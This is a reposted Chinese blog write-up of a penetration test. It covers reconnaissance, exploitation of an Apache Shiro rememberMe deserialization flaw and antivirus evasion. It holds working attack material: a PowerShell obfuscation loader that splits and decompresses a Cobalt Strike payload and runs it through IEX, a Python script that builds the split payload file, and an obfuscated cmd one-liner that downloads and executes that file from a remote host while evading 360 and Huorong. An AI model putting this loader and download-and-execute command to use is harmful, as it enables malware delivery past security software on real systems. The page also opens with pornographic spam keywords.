国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

這篇具有很好參考價值的文章主要介紹了記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1.信息收集

網(wǎng)址已無法訪問,就不貼了

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

可以使用Fofa,火線,zoomeye,searchcode.com等爬取相關(guān)的資產(chǎn),重點關(guān)注一些有漏洞暴露的框架和服務(wù)例如:泛微,PHP,Tomca,后臺,weblogic等等。之后就主要分三步:指紋識別、漏洞驗證、漏洞復(fù)現(xiàn)。

指紋識別很好理解,我們要拿歷史漏洞懟它,首先要知道,它是什么有什么漏洞,不然你這懟半天,沒有懟到點上,還容易被404警告(根據(jù)相關(guān)的指紋識別wappalyzer,云悉,Ehole,自建指紋庫等等)。

指紋探測:https://github.com/EdgeSecurityTeam/EHole

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

同時按需求和習(xí)慣把旗下50%以上控股的公司進(jìn)行收集根域–到子域收集(layer,oneforall等等)

【一一幫助安全學(xué)習(xí),所有資源獲取處一一】
①網(wǎng)絡(luò)安全學(xué)習(xí)路線
②20份滲透測試電子書
③安全攻防357頁筆記
④50份安全攻防面試指南
⑤安全紅隊滲透工具包
⑥網(wǎng)絡(luò)安全必備書籍
⑦100個漏洞實戰(zhàn)案例
⑧安全大廠內(nèi)部視頻資源

2.綜合滲透分析腦圖:

分享一個很細(xì)的工具集。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

初步收集到大量資產(chǎn)識別某個目標(biāo)是某個系統(tǒng)之后,需要針對該系統(tǒng)收集其歷史漏洞情況,然后進(jìn)行漏洞驗證。所以漏洞驗證部分需要兩步,漏洞梳理和漏洞驗證,漏洞梳理主要是從公開資料去收集目標(biāo)系統(tǒng)相關(guān)的歷史漏洞。

網(wǎng)絡(luò)上有很多資料,比如 xxx 文庫,github,還有免費開源的工具和 POC,比如 xray、nuclei,提供了很多漏洞驗證的 POC,還有付費寫的軟件和平臺;漏洞驗證部分,盡量做到無害驗證例如:挑個軟的泛微云橋公開POC驗證。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

發(fā)現(xiàn)沒有漏洞,就換個資產(chǎn)繼續(xù),滲透都是一步步來的。發(fā)現(xiàn)第一個漏洞——信息泄露,是一個好的開始,找到些配置信息仔細(xì)先記錄下來,繼續(xù)一步步擴(kuò)大成果。

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

本著以洞打洞原則:有一個漏洞必定有下一個漏洞進(jìn)行這個域名更深的滲透–反查IP發(fā)現(xiàn)無CDN是真實IP直接全端口探測,(這里用的goby,全端口用nmap低速SYN掃描方式效果最好)。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

去測試9090端口爆破沒有結(jié)果,js,目錄探測,右鍵源碼等無結(jié)果繼續(xù)換端口滲透。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

換到8088端口跳轉(zhuǎn)網(wǎng)站繼續(xù)進(jìn)行滲透。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

跳轉(zhuǎn)到http://xx.xxxxxx.com:8010/login繼續(xù)抓包爆破發(fā)現(xiàn)shiro的特征rememberMe直接去驗證:

Apache Shiro 在 Java 的權(quán)限及安全驗證框架中占用重要的一席之地,在它編號為 550 的 issue 中爆出嚴(yán)重的 Java 反序列化漏洞。為了讓瀏覽器或服務(wù)器重啟后用戶不丟失登錄狀態(tài),Shiro 支持將持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中,下次讀取時進(jìn)行解密再反序列化。

但是在 Shiro 1.2.4 版本之前內(nèi)置了一個默認(rèn)且固定的加密 Key,導(dǎo)致攻擊者可以偽造任意的 rememberMe Cookie,進(jìn)而觸發(fā)反序列化漏洞。

Payload產(chǎn)生的過程:
命令=>序列化=>AES加密=>base64編碼=>RememberMe Cookie值。
在整個漏洞利用過程中,比較重要的是AES加密的密鑰,如果沒有修改默認(rèn)的密鑰那么就很容易就知道密鑰了,Payload構(gòu)造起來也是十分的簡單。記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

驗證成功Windows單網(wǎng)卡并且出網(wǎng)。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

注意ping命令控制數(shù)量防止死ping。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

發(fā)現(xiàn)360需要免殺繞過。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

3.分離免殺:

殺毒軟件的原理是根據(jù)特征、行為、基于云查殺,云查殺主要是根據(jù)特征碼進(jìn)行查殺,每一種殺毒軟件都會檢測頭文件,所以可以進(jìn)行程序段代碼分離的形式,繞過當(dāng)前主流殺軟。

自己搭建一個Cobalt Strike運行客戶端后選powershell腳本。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

去掛載在公網(wǎng)。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

混淆方法

首先將FromBase64String改成FromBase65String。

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String("")
$s |foreach { $string = $string + $_.ToString()+','}
$string > c:\1.txt

將生成的編碼分成兩塊或者多塊再組合。

[Byte[]]$var_c1 = ?[Byte[]](FromBase65String的代碼)
[Byte[]]$var_c2 = ?[Byte[]](FromBase65String的代碼)
$var_code=$var_c1+$var_c2
$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

完整腳本。

import requests
import re 
import sys
import threading
import os
import platform 
import subprocess 
import base64
def getkey(url): 
url=url
r = requests.get(url).text
key=re.findall(r'FromBase64String\(\"(.*)\"',r) 
str1 = ''.join(key) 
return str1
def get_bypass_txt(key):
file=open("keyword.txt",'w')
file.write(key)
file.close()
#os.system("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ??$string = '';$s = [Byte[]]$var_code = [System.Convert]::FromBase64String((Get-Content ?keyword.txt));$s | foreach { $string = $string + $_.ToString()+','};$string > keyword2.txt")
with open("keyword.txt", "rb") as f:
data = f.read()
d = base64.b64decode(data)
with open("bypass.txt", "w+") as fw:
for x in d:
fw.write(str(x) + ",")
if __name__ == '__main__':
j=1 
k=0
url=input("輸入cs文件地址:")
key=getkey(url)
get_bypass_txt(key)
with open('bypass.txt', 'r') as f1:
results = f1.read() 
str=results.split(',')
k=int(len(str))
chunk=int(input("請輸入需要分的塊數(shù):"))
sum_chunk=k//chunk
for i in range(0,chunk):
#print(i+1)
if i==0:
new_str=str[0:sum_chunk]
s=",".join(new_str)
#print(s)
with open('poershell_bypass.txt','w') as f:
f.write("[Byte[]]$var_c%d = ?[Byte[]](%s)\n"% (j,s))
j+=1
# print(new_str)
elif i+1<chunk:
new_str[i]=str[sum_chunk*i:sum_chunk*(i+1)] 
#print(new_str[i]) 
s = ",".join(new_str[i])
# print(s)
with open('poershell_bypass.txt', 'a+') as f:
f.write("[Byte[]]$var_c%d = ?[Byte[]](%s)\n"% (j, s)) 
j += 1
elif i+1==chunk:
new_str[i]=str[sum_chunk*i:]
s = ",".join(new_str[i][:-1])
# print(s)
with open('poershell_bypass.txt', 'a+') as f:
f.write("[Byte[]]$var_c%d = ?[Byte[]](%s)\n" % (j, s))
j += 1
for i in range(int(chunk)):
if i==0:
with open('poershell_bypass.txt', 'a+') as f:
f.write("$var_code=$var_c%d"%(i+1))
elif i<chunk-1:
with open('poershell_bypass.txt', 'a+') as f:
f.write("+$var_c%d" % (i + 1))
elif i ==chunk - 1: 
with open('poershell_bypass.txt', 'a+') as f:
f.write("+$var_c%d \n$s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)" % (i + 1))
print("poershell_bypass.txt已經(jīng)生成完成!")

進(jìn)行分離。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

繼續(xù)掛載在CS服務(wù)器上遠(yuǎn)程下載。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

由于360和火絨對powershell命令會禁止調(diào)用,我們需要繞過360和火絨的禁止。

set aa=powers&& set bb=hell && cmd /c "echo set-alias -name test -value IEX;test(New-Object NeT."W`ebC`li`ent")."D`own`l`oadStr`ing"('ht'+'tP://192'+'.168.158.132:8888'+'/poershell_bypass.txt') | %aa%%bb% -"

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

這個點就到這。

繼續(xù)把最后的一個端口測試完發(fā)現(xiàn)掃描有.DS_Store文件泄露http://43.2xx.xx.155:8012/.DS_Store,github上找個公開腳本進(jìn)行枚舉細(xì)心審計會發(fā)現(xiàn)更多問題。

記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

這個ip這么多問題其他子域同樣來一波果真這個段還有不少問題又找到兩個弱口令。
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南
記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南

4.?總結(jié):

基于一次授權(quán)的滲透把一些思路整理一下,本次的重點在以洞打洞原則發(fā)現(xiàn)一個小洞順藤摸瓜發(fā)現(xiàn)更多的高危甚至嚴(yán)重問題,像我們?nèi)粘B透有這樣一步步思路進(jìn)行收獲都不小,當(dāng)然了運氣可以省很大部分時間和心思,一步到位的歐皇也是存在。文章來源地址http://www.zghlxwxcb.cn/news/detail-478954.html

到了這里,關(guān)于記一次網(wǎng)絡(luò)安全滲透測試實戰(zhàn)指南的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 智能網(wǎng)聯(lián)汽車網(wǎng)絡(luò)安全測試:滲透測試,模糊測試詳細(xì)講解

    智能網(wǎng)聯(lián)汽車網(wǎng)絡(luò)安全測試:滲透測試,模糊測試詳細(xì)講解

    車內(nèi)網(wǎng)絡(luò)系統(tǒng)架構(gòu) 隨著智能網(wǎng)聯(lián)汽車電子系統(tǒng)的復(fù)雜化,電子電氣架構(gòu)( Electrical/Electronic Architecture, EEA )由分布式向集中式架構(gòu)演進(jìn),如圖 2.1 所示。 在汽車 EEA 演進(jìn)的同時,為了滿足不同復(fù)雜程度的汽車功能對于通信性能的需求,車內(nèi)總線協(xié)議也在不斷發(fā)展。CAN 總線協(xié)

    2024年01月23日
    瀏覽(29)
  • 記一次靶場搭建與滲透測試

    記一次靶場搭建與滲透測試

    通過Windows7打入工作組環(huán)境,穿透兩層內(nèi)網(wǎng)拿到DC(域控制器)權(quán)限 環(huán)境搭建 網(wǎng)絡(luò)拓?fù)?虛擬機(jī)網(wǎng)絡(luò)配置 永恒之藍(lán)外網(wǎng)打點 nmap -sS 192.168.2.0/24掃描外網(wǎng)存活主機(jī),發(fā)現(xiàn)兩臺主機(jī)192.168.2.128和192.168.2.129,并且445端口都是打開的,可能存在永恒之藍(lán)漏洞 用msf來進(jìn)行永恒之藍(lán)漏洞的

    2024年01月23日
    瀏覽(18)
  • 網(wǎng)絡(luò)安全滲透測試的八個步驟

    網(wǎng)絡(luò)安全滲透測試的八個步驟

    ?一、明確目標(biāo) ?1.確定范圍:測試目標(biāo)的范疇、ip、網(wǎng)站域名、內(nèi)外網(wǎng)、檢測帳戶。 2.確定標(biāo)準(zhǔn):能滲入到何種程度,所花費的時間、能不能改動提交、能不能漏洞利用、這些。 3.確定要求:web應(yīng)用的漏洞、業(yè)務(wù)邏輯漏洞、工作人員管理權(quán)限管理漏洞、這些。 ?二、信息收

    2024年02月04日
    瀏覽(25)
  • 【網(wǎng)絡(luò)安全】DVWA靶場實戰(zhàn)&BurpSuite內(nèi)網(wǎng)滲透

    【網(wǎng)絡(luò)安全】DVWA靶場實戰(zhàn)&BurpSuite內(nèi)網(wǎng)滲透

    我們先來認(rèn)識一下BurpSuite中有哪些攻擊模式,然后開始實戰(zhàn)操作 下面攻擊案例即將使用,對單個參數(shù)進(jìn)行攻擊破解 聯(lián)想戰(zhàn)爭中狙擊手的作用,一次只能擊殺一名敵人 聯(lián)想古代的攻城錘,特點就是攻擊范圍比狙擊手大,但是效率不一定高 可以設(shè)置多個攻擊字段,但是payload值

    2024年02月13日
    瀏覽(17)
  • 【網(wǎng)絡(luò)安全】滲透測試工具——Burp Suite

    【網(wǎng)絡(luò)安全】滲透測試工具——Burp Suite

    文章較長,看之前建議先了解以下四個問題 問題一、Burp Suite是什么? Burp Suite是一個集成化的滲透測試工具,它集合了多種滲透測試組件,使我們自動化地或手工地能更好的完成對web應(yīng)用的滲透測試和攻擊。 在滲透測試中,我們使用Burp Suite將使得測試工作變得更加快捷高效

    2024年02月16日
    瀏覽(37)
  • 2023年網(wǎng)絡(luò)安全比賽--綜合滲透測試(超詳細(xì))

    2023年網(wǎng)絡(luò)安全比賽--綜合滲透測試(超詳細(xì))

    一、競賽時間 180分鐘 共計3小時 二、競賽階段 競賽階段 任務(wù)階段 競賽任務(wù) 競賽時間 分值 1.掃描目標(biāo)靶機(jī)將靶機(jī)開放的所有端口,當(dāng)作flag提交(例:21,22,23); 2.掃描目標(biāo)靶機(jī)將靶機(jī)的http服務(wù)版本信息當(dāng)作flag提交(例:apache 2.3.4); 3.靶機(jī)網(wǎng)站存在目錄遍歷漏洞,請將h

    2024年02月12日
    瀏覽(27)
  • 安全滲透測試網(wǎng)絡(luò)基礎(chǔ)知識之路由技術(shù)

    #1.靜態(tài)路由技術(shù) ##1.1路由技術(shù)種類: 靜態(tài)路由技術(shù)、動態(tài)路由技術(shù) ##1.2靜態(tài)路由原理 靜態(tài)路由是網(wǎng)絡(luò)中一種手動配置的路由方式,用于指定數(shù)據(jù)包在網(wǎng)絡(luò)中的傳輸路徑。與動態(tài)路由協(xié)議不同,靜態(tài)路由需要管理員手動配置路由表,指定目的網(wǎng)絡(luò)和下一跳路由器的關(guān)聯(lián)關(guān)系。

    2024年02月06日
    瀏覽(33)
  • 記一次奇妙的某個edu滲透測試

    記一次奇妙的某個edu滲透測試

    對登錄方法的輕視造成一系列的漏洞出現(xiàn),對接口確實鑒權(quán)造成大量的信息泄露。從小程序到web端網(wǎng)址的奇妙的測試就此開始。(文章厚碼,請見諒) 1. 尋找到目標(biāo)站點的小程序 進(jìn)入登錄發(fā)現(xiàn)只需要姓名加學(xué)工號就能成功登錄,通過googlehack的語法成功找到學(xué)生姓名和學(xué)號,

    2024年04月16日
    瀏覽(28)
  • 網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測試

    網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測試

    1.通過滲透機(jī)Kali1.0對服務(wù)器場景PYsystem20192進(jìn)行Web滲透測試(使用工具w3af的對目標(biāo)Web服務(wù)器進(jìn)行審計),在w3af的命令行界面下,使用命令列出所有用于審計的插件,將該操作使用的命令作為Flag值提交; 進(jìn)入kali命令控制臺中使用命令w3af_console進(jìn)入w3af命令行模式,通過輸入命令

    2024年01月25日
    瀏覽(28)
  • [滲透測試]—5.1 網(wǎng)絡(luò)設(shè)備的安全漏洞

    [滲透測試]—5.1 網(wǎng)絡(luò)設(shè)備的安全漏洞

    在這一章節(jié)中,我們將重點討論網(wǎng)絡(luò)設(shè)備(如路由器、交換機(jī)等)的安全漏洞,以及如何進(jìn)行網(wǎng)絡(luò)設(shè)備的滲透測試。請放心,我們會盡量講得詳細(xì)、通俗易懂,并提供盡可能多的實例。 網(wǎng)絡(luò)設(shè)備,如路由器和交換機(jī),是構(gòu)成計算機(jī)網(wǎng)絡(luò)的基本元素。這些設(shè)備負(fù)責(zé)在網(wǎng)絡(luò)中轉(zhuǎn)發(fā)

    2024年02月11日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包